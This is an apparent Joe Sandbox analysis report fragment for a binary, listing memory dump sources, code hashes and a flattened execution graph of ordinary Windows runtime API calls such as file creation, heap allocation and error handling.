                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2012307162-0
                                                                                                                                                                        • Opcode ID: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                        • Instruction ID: be474dc0c234308dd2e1be3567ee9f8499df09279fdee96d84a1dc7adb201af1
                                                                                                                                                                        • Opcode Fuzzy Hash: 8bd96ceb466858fd9de0e686483de91653dbf8c714341a4d1fad151aa90c16d2
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F519DB1A006059FDB18DF68C985AAEBBB5FB48360F14462DE929E7380D734FD44DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00F31E01
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00F31E21
                                                                                                                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00F31EA7
                                                                                                                                                                        • LocalFree.KERNEL32(00000001,72A902E8,00000000,00000000,00F73C40,000000FF,?,00000000), ref: 00F31F2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2012307162-0
                                                                                                                                                                        • Opcode ID: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                        • Instruction ID: 951de30956ca153643b851778e3459de1d7b758b036e31c76f4b8adfd608b9ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 003d15609ea4b1fa49dbd6d9c783b8d96cbdea036ef8c8a7619670f19be2b016
                                                                                                                                                                        • Instruction Fuzzy Hash: F251E172A082159FC715EF28DC40A6ABBE8FB49370F110A2EF916D7290DB71E9449791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:4.2%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0.1%
                                                                                                                                                                        Total number of Nodes:1637
                                                                                                                                                                        Total number of Limit Nodes:35
75829 7ff738ab1780 17 API calls 3 library calls 75800->75829 75830 7ff738ab1c00 17 API calls __scrt_get_show_window_mode 75802->75830 75805->75809 75828 7ff738a518d0 15 API calls 2 library calls 75805->75828 75806->75809 75810 7ff738ab0c72 memcpy_s 75806->75810 75832 7ff738ab1550 15 API calls wcsxfrm 75806->75832 75833 7ff738aaf810 15 API calls 75809->75833 75810->75608 75811->75806 75811->75809 75831 7ff738a87200 17 API calls __ExceptionPtrDestroy 75811->75831 75813->75782 75821 7ff738a48d00 75814->75821 75816 7ff738a4c09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 75817 7ff738a4c285 75816->75817 75826 7ff738a4b310 15 API calls 3 library calls 75816->75826 75817->75793 75819->75793 75820->75793 75823 7ff738a48d45 75821->75823 75825 7ff738a58b40 10 API calls 75821->75825 75822 7ff738a48d64 75822->75816 75823->75822 75827 7ff738a40690 15 API calls 2 library calls 75823->75827 75825->75823 75826->75817 75827->75822 75828->75809 75829->75810 75830->75810 75831->75806 75832->75809 75833->75810 75835 7ff738a7ee25 75834->75835 75836 7ff738a7ee4a 75835->75836 75851 7ff738a41310 15 API calls __ExceptionPtrDestroy 75835->75851 75836->75617 75838 7ff738abdc40 75836->75838 75839 7ff738abdc70 75838->75839 75847 7ff738abddcc _handle_error _mbsncpy_s 75839->75847 75852 7ff738abde50 75839->75852 75841 7ff738abdd15 75873 7ff738a35074 75841->75873 75843 7ff738abdd4a 75844 7ff738abdd81 75843->75844 75876 7ff738a4d720 15 API calls 2 library calls 75843->75876 75877 7ff738abe6e0 15 API calls memcpy_s 75844->75877 75847->75617 75848->75622 75849->75619 75850->75618 75851->75836 75853 7ff738abdebb __scrt_get_show_window_mode 75852->75853 75865 7ff738abdf15 75853->75865 75878 7ff738abda60 15 API calls task 75853->75878 75856 7ff738abe391 75859 7ff738ab0960 17 API calls 75856->75859 75857 7ff738abe18f 75861 7ff738abe212 75857->75861 75867 7ff738abe1af 75857->75867 75879 7ff738a41010 15 API calls std::rsfun 75857->75879 75858 7ff738abe64c 75860 7ff738abe665 
75858->75860 75884 7ff738a41010 15 API calls std::rsfun 75858->75884 75866 7ff738abe513 75859->75866 75860->75841 75880 7ff738abdac0 15 API calls 75861->75880 75865->75857 75865->75858 75870 7ff738abdf1c 75865->75870 75866->75841 75868 7ff738abe30d 75867->75868 75867->75870 75871 7ff738abe2c8 75867->75871 75868->75870 75882 7ff738abda60 15 API calls task 75868->75882 75870->75856 75883 7ff738a41010 15 API calls std::rsfun 75870->75883 75871->75870 75881 7ff738abda60 15 API calls task 75871->75881 75874 7ff738a3508b LoadLibraryW 75873->75874 75874->75843 75876->75844 75877->75847 75878->75865 75879->75861 75880->75867 75881->75870 75882->75870 75883->75856 75884->75860 75898 7ff738a75cb0 75885->75898 75888 7ff738a75d82 75890 7ff738a76820 75888->75890 75897 7ff738a76861 75890->75897 75891 7ff738a7691a 75892 7ff738a76920 75891->75892 75921 7ff738a44d00 38 API calls 2 library calls 75891->75921 75892->75628 75897->75891 75904 7ff738a618c0 75897->75904 75911 7ff738b0143c 75897->75911 75920 7ff738a41310 15 API calls __ExceptionPtrDestroy 75897->75920 75899 7ff738a75ccd 75898->75899 75901 7ff738a75d1a 75899->75901 75903 7ff738a41110 15 API calls 2 library calls 75899->75903 75901->75888 75902 7ff738a41010 15 API calls std::rsfun 75901->75902 75902->75888 75903->75901 75905 7ff738a61926 75904->75905 75909 7ff738a618e4 75904->75909 75906 7ff738a619ab std::rsfun 75905->75906 75908 7ff738a619cb std::rsfun 75905->75908 75905->75909 75922 7ff738a61a40 15 API calls 2 library calls 75906->75922 75908->75909 75923 7ff738a82fe0 15 API calls type_info::_name_internal_method 75908->75923 75909->75897 75912 7ff738b0145c 75911->75912 75913 7ff738b01476 75911->75913 75912->75913 75914 7ff738b01466 75912->75914 75915 7ff738b0147e 75912->75915 75913->75897 75931 7ff738afaef8 75914->75931 75924 7ff738b011ec 75915->75924 75920->75897 75921->75892 75922->75909 75923->75909 75935 7ff738ae1c78 EnterCriticalSection 75924->75935 75926 7ff738b01209 75927 7ff738b0122c 55 API calls 75926->75927 
75928 7ff738b01212 75927->75928 75929 7ff738ae1c84 _fread_nolock LeaveCriticalSection 75928->75929 75930 7ff738b0121d 75929->75930 75930->75913 75936 7ff738b0ab1c GetLastError 75931->75936 75933 7ff738afaf01 75934 7ff738b08b14 23 API calls _invalid_parameter_noinfo 75933->75934 75934->75913 75937 7ff738b0ab43 75936->75937 75938 7ff738b0ab3e 75936->75938 75942 7ff738b0ab4b SetLastError 75937->75942 75960 7ff738b09828 6 API calls try_get_function 75937->75960 75959 7ff738b097e0 6 API calls try_get_function 75938->75959 75941 7ff738b0ab66 75941->75942 75961 7ff738b0921c 75941->75961 75942->75933 75946 7ff738b0ab97 75970 7ff738b09828 6 API calls try_get_function 75946->75970 75947 7ff738b0ab87 75968 7ff738b09828 6 API calls try_get_function 75947->75968 75950 7ff738b0ab9f 75951 7ff738b0aba3 75950->75951 75952 7ff738b0abb5 75950->75952 75971 7ff738b09828 6 API calls try_get_function 75951->75971 75972 7ff738b0a750 14 API calls _invalid_parameter_noinfo 75952->75972 75956 7ff738b0abbd 75973 7ff738b09294 14 API calls 2 library calls 75956->75973 75957 7ff738b0ab8e 75969 7ff738b09294 14 API calls 2 library calls 75957->75969 75960->75941 75966 7ff738b0922d wcsftime 75961->75966 75962 7ff738b0927e 75965 7ff738afaef8 _set_fmode 13 API calls 75962->75965 75963 7ff738b09262 RtlAllocateHeap 75964 7ff738b0927c 75963->75964 75963->75966 75964->75946 75964->75947 75965->75964 75966->75962 75966->75963 75974 7ff738b1addc EnterCriticalSection LeaveCriticalSection wcsftime 75966->75974 75968->75957 75969->75942 75970->75950 75971->75957 75972->75956 75973->75942 75974->75966 75979 7ff738a48037 75975->75979 75976 7ff738a4808d 76061 7ff738a44b70 75976->76061 75979->75976 76076 7ff738a3ca10 75979->76076 76082 7ff738a3c860 15 API calls 4 library calls 75979->76082 76083 7ff738a3dce0 75979->76083 75981 7ff738a48100 76072 7ff738a3b4e0 75981->76072 75982 7ff738a3ca10 task 15 API calls 75985 7ff738a480a9 75982->75985 75985->75981 75985->75982 75987 7ff738a3d5e0 wcsxfrm 15 API calls 
75985->75987 75986 7ff738a4810f 75986->75639 75987->75985 75989 7ff738a3d0c0 wcsxfrm 15 API calls 75988->75989 75990 7ff738a356c5 75989->75990 75991 7ff738a3571b 75990->75991 76138 7ff738a3c860 15 API calls 4 library calls 75990->76138 76139 7ff738a3d7d0 15 API calls 3 library calls 75990->76139 75993 7ff738a3d5e0 wcsxfrm 15 API calls 75991->75993 75994 7ff738a35731 75993->75994 75994->75644 76039 7ff738a368d0 117 API calls 75994->76039 75997 7ff738a366cd 75996->75997 75998 7ff738a36872 75997->75998 75999 7ff738a36722 75997->75999 76011 7ff738a36746 75997->76011 76143 7ff738a36230 75 API calls wcsxfrm 75998->76143 76000 7ff738a3672d 75999->76000 76001 7ff738a3689e 75999->76001 76004 7ff738a3674b 76000->76004 76005 7ff738a36734 76000->76005 76144 7ff738a362c0 75 API calls _free_nolock 76001->76144 76140 7ff738a357b0 98 API calls 2 library calls 76004->76140 76006 7ff738a3673f 76005->76006 76007 7ff738a36816 76005->76007 76006->76011 76141 7ff738a35840 77 API calls 2 library calls 76006->76141 76142 7ff738a360e0 75 API calls 3 library calls 76007->76142 76011->75648 76011->75655 76012 7ff738a35d60 76011->76012 76013 7ff738a35d96 76012->76013 76145 7ff738a43f90 76013->76145 76018 7ff738a35e01 wcsxfrm 76020 7ff738a35e15 wcsxfrm 76018->76020 76021 7ff738a35e76 76018->76021 76026 7ff738a35e49 76020->76026 76168 7ff738a3cfa0 15 API calls 3 library calls 76020->76168 76022 7ff738a3b4e0 wcsxfrm 15 API calls 76021->76022 76028 7ff738a35e58 wcsxfrm 76022->76028 76025 7ff738a35e96 76169 7ff738a35300 76025->76169 76027 7ff738a3b4e0 wcsxfrm 15 API calls 76026->76027 76027->76028 76158 7ff738a35430 76028->76158 76029->75655 76030->75636 76032 7ff738a3d600 std::rsfun wcsxfrm 76031->76032 76033 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76032->76033 76034 7ff738a3d621 _free_nolock 76033->76034 76691 7ff738a4f8b0 76034->76691 76036 7ff738a3d647 task 76037 7ff738a3d654 task 76036->76037 76038 7ff738a32f9e strrchr 15 API calls 76036->76038 76037->75634 76038->76037 
76039->75644 76040->75643 76041->75652 76042->75655 76044 7ff738afa205 76043->76044 76048 7ff738a36b2e 76043->76048 76045 7ff738afaef8 _set_fmode 14 API calls 76044->76045 76046 7ff738afa20a 76045->76046 76746 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76046->76746 76049 7ff738afa548 76048->76049 76050 7ff738afa551 76049->76050 76051 7ff738afa55e 76049->76051 76052 7ff738afaef8 _set_fmode 14 API calls 76050->76052 76053 7ff738afaef8 _set_fmode 14 API calls 76051->76053 76055 7ff738a36b35 76051->76055 76052->76055 76054 7ff738afa595 76053->76054 76747 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76054->76747 76055->75660 76055->75661 76057->75664 76058->75666 76059->75655 76060->75655 76087 7ff738a3b5f0 76061->76087 76063 7ff738a3b4e0 wcsxfrm 15 API calls 76070 7ff738a44b95 std::rsfun wcsxfrm _free_nolock 76063->76070 76064 7ff738a44ca8 76065 7ff738a3b4e0 wcsxfrm 15 API calls 76064->76065 76066 7ff738a44cb7 76065->76066 76066->75985 76068 7ff738a3c7a0 15 API calls _free_nolock 76068->76070 76069 7ff738a3b5f0 wcsxfrm 15 API calls 76069->76070 76070->76063 76070->76064 76070->76066 76070->76068 76070->76069 76091 7ff738a3d0c0 76070->76091 76097 7ff738a3d4e0 15 API calls 3 library calls 76070->76097 76073 7ff738a3b4f8 76072->76073 76074 7ff738a3b563 76072->76074 76073->76074 76075 7ff738a3aca0 _free_nolock 15 API calls 76073->76075 76074->75986 76074->76074 76075->76074 76077 7ff738a3ca3f task _mbsncpy_s 76076->76077 76128 7ff738a4ea50 76077->76128 76079 7ff738a3ca64 task 76080 7ff738a3cb36 76079->76080 76131 7ff738a3ad60 15 API calls _free_nolock 76079->76131 76080->75979 76082->75979 76084 7ff738a3dd0a 76083->76084 76132 7ff738a32f9e 76084->76132 76088 7ff738a3b60b wcsxfrm task 76087->76088 76089 7ff738a3b65b 76088->76089 76098 7ff738a3ad60 15 API calls _free_nolock 76088->76098 76089->76070 76092 7ff738a3d0ee _mbsncpy_s 76091->76092 76099 7ff738a4c600 76092->76099 76094 7ff738a3d15b 76094->76070 76095 7ff738a3d10b wcsxfrm 76095->76094 76103 
7ff738a3ad60 15 API calls _free_nolock 76095->76103 76097->76070 76098->76089 76100 7ff738a4c619 __ExceptionPtrDestroy 76099->76100 76104 7ff738a4c5a0 76100->76104 76102 7ff738a4c67d 76102->76095 76103->76094 76107 7ff738a4dff0 76104->76107 76106 7ff738a4c5c5 wcsxfrm 76106->76102 76108 7ff738a4e0cc 76107->76108 76109 7ff738a4e00d 76107->76109 76110 7ff738a48da0 task 15 API calls 76108->76110 76109->76108 76111 7ff738a4e023 76109->76111 76114 7ff738a4e0db 76110->76114 76120 7ff738a48da0 76111->76120 76113 7ff738a4e03c 76116 7ff738a4e1c7 76113->76116 76126 7ff738a4de50 15 API calls 2 library calls 76113->76126 76114->76113 76115 7ff738a4e17d 76114->76115 76125 7ff738a40950 15 API calls strrchr 76114->76125 76118 7ff738a48d00 _free_nolock 15 API calls 76115->76118 76116->76106 76118->76113 76124 7ff738a58b40 10 API calls 76120->76124 76121 7ff738a48dd6 76122 7ff738a48ded 76121->76122 76127 7ff738a40690 15 API calls 2 library calls 76121->76127 76122->76113 76124->76121 76125->76115 76126->76116 76127->76122 76129 7ff738a48da0 task 15 API calls 76128->76129 76130 7ff738a4ea7b 76129->76130 76130->76079 76131->76080 76133 7ff738a32fab 76132->76133 76134 7ff738a3301d 76133->76134 76137 7ff738a50f90 15 API calls 2 library calls 76133->76137 76136 7ff738a32420 76137->76136 76138->75990 76139->75990 76140->76011 76141->76011 76142->76011 76143->76011 76144->76011 76177 7ff738a44050 76145->76177 76147 7ff738a35dd4 76147->76025 76148 7ff738a3cde0 76147->76148 76149 7ff738a3ce00 std::rsfun wcsxfrm 76148->76149 76150 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76149->76150 76151 7ff738a3ce21 _free_nolock 76150->76151 76647 7ff738a4f6e0 76151->76647 76153 7ff738a3ce47 76154 7ff738a3ce8a task 76153->76154 76155 7ff738a32f9e strrchr 15 API calls 76153->76155 76156 7ff738a3cf04 76154->76156 76654 7ff738a3ad60 15 API calls _free_nolock 76154->76654 76155->76154 76156->76018 76159 7ff738a3544c 76158->76159 76160 7ff738a3ca10 task 15 API calls 76159->76160 76161 
7ff738a35468 wcsxfrm 76160->76161 76657 7ff738afa97c 76161->76657 76166 7ff738afa97c 17 API calls 76167 7ff738a354c8 wcsxfrm 76166->76167 76167->76025 76168->76020 76170 7ff738a3536b 76169->76170 76171 7ff738a35314 wcsxfrm 76169->76171 76170->75648 76171->76170 76689 7ff738a3c230 15 API calls 4 library calls 76171->76689 76173 7ff738a35339 76690 7ff738a35250 60 API calls _wcsupr_s 76173->76690 76175 7ff738a3535c 76176 7ff738a3b4e0 wcsxfrm 15 API calls 76175->76176 76176->76170 76178 7ff738a44083 76177->76178 76181 7ff738a440f5 _wcsupr_s 76177->76181 76205 7ff738afb114 76178->76205 76224 7ff738a43e80 76181->76224 76182 7ff738a440d9 76250 7ff738a3c990 15 API calls 2 library calls 76182->76250 76183 7ff738a440a4 76186 7ff738afaef8 _set_fmode 14 API calls 76183->76186 76188 7ff738a440a9 76186->76188 76187 7ff738a4413f 76230 7ff738afb02c 76187->76230 76248 7ff738afb448 23 API calls 3 library calls 76188->76248 76191 7ff738a440b0 76249 7ff738a3c990 15 API calls 2 library calls 76191->76249 76194 7ff738a44155 76195 7ff738afaef8 _set_fmode 14 API calls 76194->76195 76197 7ff738a4419e 76195->76197 76196 7ff738a441e3 _wcsupr_s 76198 7ff738a440cf _handle_error 76196->76198 76236 7ff738afaf9c 76196->76236 76251 7ff738afb448 23 API calls 3 library calls 76197->76251 76198->76147 76201 7ff738a441a5 76252 7ff738a3c990 15 API calls 2 library calls 76201->76252 76203 7ff738a441c7 76203->76198 76204 7ff738afaf9c _wcsupr_s 57 API calls 76203->76204 76204->76198 76206 7ff738afb058 76205->76206 76207 7ff738afb075 76206->76207 76210 7ff738afb0a1 76206->76210 76208 7ff738afaef8 _set_fmode 14 API calls 76207->76208 76209 7ff738afb07a 76208->76209 76265 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76209->76265 76211 7ff738afb0a6 76210->76211 76212 7ff738afb0b3 76210->76212 76214 7ff738afaef8 _set_fmode 14 API calls 76211->76214 76253 7ff738b0d698 76212->76253 76217 7ff738a44097 76214->76217 76217->76182 76217->76183 76218 7ff738afb0d4 76260 7ff738b0dabc 76218->76260 76219 
7ff738afb0c7 76220 7ff738afaef8 _set_fmode 14 API calls 76219->76220 76220->76217 76222 7ff738afb0e8 _wcsupr_s 76266 7ff738ae1c84 LeaveCriticalSection 76222->76266 76225 7ff738a43ec6 _mbsncpy_s 76224->76225 76386 7ff738a33037 76225->76386 76227 7ff738a43f2b 76394 7ff738a573c0 76227->76394 76229 7ff738a43f41 _mbsncpy_s 76229->76187 76231 7ff738afb035 76230->76231 76232 7ff738a4414d 76230->76232 76233 7ff738afaef8 _set_fmode 14 API calls 76231->76233 76232->76194 76232->76196 76234 7ff738afb03a 76233->76234 76644 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76234->76644 76237 7ff738afafb3 76236->76237 76238 7ff738afafd1 76236->76238 76239 7ff738afaef8 _set_fmode 14 API calls 76237->76239 76246 7ff738afafc3 _wcsupr_s 76238->76246 76645 7ff738ae1c78 EnterCriticalSection 76238->76645 76241 7ff738afafb8 76239->76241 76646 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76241->76646 76242 7ff738afafe7 76244 7ff738afaf18 _wcsupr_s 55 API calls 76242->76244 76245 7ff738afaff0 76244->76245 76247 7ff738ae1c84 _fread_nolock LeaveCriticalSection 76245->76247 76246->76198 76247->76246 76248->76191 76249->76198 76250->76181 76251->76201 76252->76203 76267 7ff738b091ac EnterCriticalSection 76253->76267 76255 7ff738b0d6af 76256 7ff738b0d70c _wcsupr_s 17 API calls 76255->76256 76257 7ff738b0d6ba 76256->76257 76258 7ff738b09200 _isindst LeaveCriticalSection 76257->76258 76259 7ff738afb0bd 76258->76259 76259->76218 76259->76219 76268 7ff738b0d7f8 76260->76268 76263 7ff738b0db16 76263->76222 76265->76217 76269 7ff738b0d822 _wcsupr_s 76268->76269 76278 7ff738b0d9d5 76269->76278 76283 7ff738b1b0e4 26 API calls 3 library calls 76269->76283 76270 7ff738afaef8 _set_fmode 14 API calls 76271 7ff738b0da9b 76270->76271 76286 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76271->76286 76273 7ff738b0d9de 76273->76263 76280 7ff738b11dd8 76273->76280 76275 7ff738b0da36 76275->76278 76284 7ff738b1b0e4 26 API calls 3 library calls 76275->76284 76277 7ff738b0da57 76277->76278 76285 
7ff738b1b0e4 26 API calls 3 library calls 76277->76285 76278->76270 76278->76273 76287 7ff738b11698 76280->76287 76283->76275 76284->76277 76285->76278 76286->76273 76288 7ff738b116cd 76287->76288 76289 7ff738b116af 76287->76289 76288->76289 76292 7ff738b116e9 76288->76292 76290 7ff738afaef8 _set_fmode 14 API calls 76289->76290 76291 7ff738b116b4 76290->76291 76309 7ff738b08b14 23 API calls _invalid_parameter_noinfo 76291->76309 76298 7ff738b11cc0 76292->76298 76295 7ff738b116c0 76295->76263 76311 7ff738ae3ea8 76298->76311 76303 7ff738b11d23 76319 7ff738b04f28 76303->76319 76305 7ff738b11d7b 76307 7ff738b11714 76305->76307 76385 7ff738b09294 14 API calls 2 library calls 76305->76385 76307->76295 76310 7ff738b17978 LeaveCriticalSection 76307->76310 76309->76295 76312 7ff738ae3ecc 76311->76312 76313 7ff738ae3ec7 76311->76313 76312->76313 76314 7ff738b0a9a0 _Wcsftime 26 API calls 76312->76314 76313->76303 76384 7ff738b095a0 5 API calls try_get_function 76313->76384 76315 7ff738ae3ee7 76314->76315 76316 7ff738b0ac48 _Wcsftime 26 API calls 76315->76316 76317 7ff738ae3f0a 76316->76317 76318 7ff738b0ac7c _Wcsftime 26 API calls 76317->76318 76318->76313 76320 7ff738b04f73 76319->76320 76321 7ff738b04f51 76319->76321 76322 7ff738b04fcc 76320->76322 76323 7ff738b04f77 76320->76323 76324 7ff738b09294 __free_lconv_mon 14 API calls 76321->76324 76331 7ff738b04f5f 76321->76331 76325 7ff738b12ff4 wcsftime MultiByteToWideChar 76322->76325 76326 7ff738b04f8b 76323->76326 76327 7ff738b09294 __free_lconv_mon 14 API calls 76323->76327 76323->76331 76324->76331 76333 7ff738b04fe7 76325->76333 76328 7ff738b0a290 wcsftime 15 API calls 76326->76328 76327->76326 76328->76331 76329 7ff738b04fee GetLastError 76332 7ff738afae88 wcsftime 14 API calls 76329->76332 76330 7ff738b05027 76330->76331 76335 7ff738b12ff4 wcsftime MultiByteToWideChar 76330->76335 76331->76305 76341 7ff738b11e0c 76331->76341 76336 7ff738b04ffb 76332->76336 76333->76329 76333->76330 76334 7ff738b0501b 76333->76334 76337 
7ff738b09294 __free_lconv_mon 14 API calls 76333->76337 76338 7ff738b0a290 wcsftime 15 API calls 76334->76338 76339 7ff738b0506f 76335->76339 76340 7ff738afaef8 _set_fmode 14 API calls 76336->76340 76337->76334 76338->76330 76339->76329 76339->76331 76340->76331 76342 7ff738b119f0 tmpfile 23 API calls 76341->76342 76343 7ff738b11e53 76342->76343 76344 7ff738b11e99 76343->76344 76345 7ff738b11e81 76343->76345 76346 7ff738b179a0 tmpfile 18 API calls 76344->76346 76347 7ff738afaed8 _fread_nolock 14 API calls 76345->76347 76348 7ff738b11e9e 76346->76348 76349 7ff738b11e86 76347->76349 76350 7ff738b11ebe CreateFileW 76348->76350 76351 7ff738b11ea5 76348->76351 76352 7ff738afaef8 _set_fmode 14 API calls 76349->76352 76354 7ff738b11f29 76350->76354 76355 7ff738b11fa4 GetFileType 76350->76355 76353 7ff738afaed8 _fread_nolock 14 API calls 76351->76353 76356 7ff738b11e92 76352->76356 76359 7ff738b11eaa 76353->76359 76360 7ff738b11f71 GetLastError 76354->76360 76363 7ff738b11f37 CreateFileW 76354->76363 76357 7ff738b11fb1 GetLastError 76355->76357 76358 7ff738b12002 76355->76358 76356->76305 76361 7ff738afae88 wcsftime 14 API calls 76357->76361 76367 7ff738b178b8 tmpfile 15 API calls 76358->76367 76362 7ff738afaef8 _set_fmode 14 API calls 76359->76362 76364 7ff738afae88 wcsftime 14 API calls 76360->76364 76365 7ff738b11fc0 CloseHandle 76361->76365 76362->76349 76363->76355 76363->76360 76364->76349 76365->76349 76366 7ff738b11ff2 76365->76366 76368 7ff738afaef8 _set_fmode 14 API calls 76366->76368 76369 7ff738b12024 76367->76369 76370 7ff738b11ff7 76368->76370 76371 7ff738b12074 76369->76371 76372 7ff738b11bfc tmpfile 62 API calls 76369->76372 76370->76349 76373 7ff738b1175c tmpfile 62 API calls 76371->76373 76375 7ff738b1207b 76371->76375 76372->76371 76374 7ff738b120b2 76373->76374 76374->76375 76376 7ff738b120bc 76374->76376 76377 7ff738b0d5d8 tmpfile 26 API calls 76375->76377 76376->76356 76378 7ff738b1213c CloseHandle CreateFileW 76376->76378 76377->76356 76379 
7ff738b12183 GetLastError 76378->76379 76380 7ff738b121b1 76378->76380 76381 7ff738afae88 wcsftime 14 API calls 76379->76381 76380->76356 76382 7ff738b12190 76381->76382 76383 7ff738b17ae0 tmpfile 15 API calls 76382->76383 76383->76380 76384->76303 76385->76307 76401 7ff738a564e4 76386->76401 76406 7ff738a3b3d0 76386->76406 76411 7ff738a44490 76386->76411 76387 7ff738a32fd8 76389 7ff738a32ddf 76387->76389 76425 7ff738a50f90 15 API calls 2 library calls 76387->76425 76389->76227 76389->76389 76390 7ff738a32420 76638 7ff738a56f90 76394->76638 76397 7ff738a56f90 _mbsncpy_s 10 API calls 76398 7ff738a5742c 76397->76398 76641 7ff738a57010 76398->76641 76426 7ff738a9a950 76401->76426 76403 7ff738a56505 76452 7ff738a55590 76403->76452 76405 7ff738a5650f 76405->76387 76524 7ff738a48450 76406->76524 76553 7ff738a57170 76411->76553 76413 7ff738a4456d 76414 7ff738a44585 76413->76414 76415 7ff738a44574 76413->76415 76582 7ff738a66200 91 API calls 5 library calls 76414->76582 76566 7ff738a64c00 76415->76566 76418 7ff738a444cf _free_nolock 76418->76413 76580 7ff738a405a0 15 API calls 2 library calls 76418->76580 76419 7ff738a4457e 76583 7ff738a4eae0 15 API calls 76419->76583 76421 7ff738a445b6 76421->76387 76423 7ff738a4454c 76581 7ff738a40600 5 API calls _free_nolock 76423->76581 76425->76390 76427 7ff738a9a9b7 76426->76427 76462 7ff738a9a900 76427->76462 76429 7ff738a9aa15 76466 7ff738a537c0 76429->76466 76431 7ff738a9aa87 76469 7ff738a8aa20 76431->76469 76437 7ff738a9f750 5 API calls 76446 7ff738a9abb7 76437->76446 76438 7ff738a9b460 18 API calls 76438->76446 76440 7ff738a9f660 18 API calls 76440->76446 76445 7ff738a9aebf memcpy_s 76492 7ff738a9f750 76445->76492 76446->76437 76446->76438 76446->76440 76446->76445 76447 7ff738a537c0 15 API calls 76446->76447 76478 7ff738aae3a0 76446->76478 76482 7ff738a9e150 76446->76482 76488 7ff738aa21b0 76446->76488 76496 7ff738aae040 18 API calls 76446->76496 76497 7ff738aacc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext 
RtlVirtualUnwind RaiseException 76446->76497 76498 7ff738aa04a0 18 API calls 76446->76498 76499 7ff738aad4f0 18 API calls 2 library calls 76446->76499 76447->76446 76451 7ff738a9aff8 _handle_error 76451->76403 76453 7ff738a55611 76452->76453 76519 7ff738a8aa90 76453->76519 76455 7ff738a5597e 76455->76405 76456 7ff738a5583b 76456->76455 76522 7ff738aaee70 15 API calls 2 library calls 76456->76522 76458 7ff738a5589d 76458->76455 76459 7ff738a4b7a0 type_info::_name_internal_method 15 API calls 76458->76459 76460 7ff738a558e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76459->76460 76523 7ff738aaf070 73 API calls _wcsupr_s 76460->76523 76463 7ff738a9a930 76462->76463 76464 7ff738a9a926 76462->76464 76463->76429 76501 7ff738ab5d90 15 API calls _free_nolock 76464->76501 76467 7ff738a48d00 _free_nolock 15 API calls 76466->76467 76468 7ff738a5383b memcpy_s 76467->76468 76468->76431 76470 7ff738a8aa49 76469->76470 76471 7ff738a8aa3d 76469->76471 76505 7ff738a8aee0 76470->76505 76502 7ff738a8b0e0 76471->76502 76474 7ff738a8aa47 76475 7ff738aac660 76474->76475 76511 7ff738aa2a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76475->76511 76477 7ff738aac685 76477->76446 76479 7ff738aae3e6 76478->76479 76481 7ff738aae5dd 76479->76481 76512 7ff738a536b0 5 API calls 2 library calls 76479->76512 76481->76446 76485 7ff738a9e16f 76482->76485 76483 7ff738a9e273 76483->76446 76484 7ff738a9e1e6 76484->76483 76487 7ff738a9b460 18 API calls 76484->76487 76485->76484 76513 7ff738a9b460 76485->76513 76487->76484 76490 7ff738aa21c8 type_info::_name_internal_method 76488->76490 76489 7ff738aa2291 76489->76446 76490->76489 76517 7ff738a9e540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76490->76517 76493 7ff738a9f775 76492->76493 76494 7ff738a9af63 76492->76494 76493->76494 76518 7ff738a536b0 5 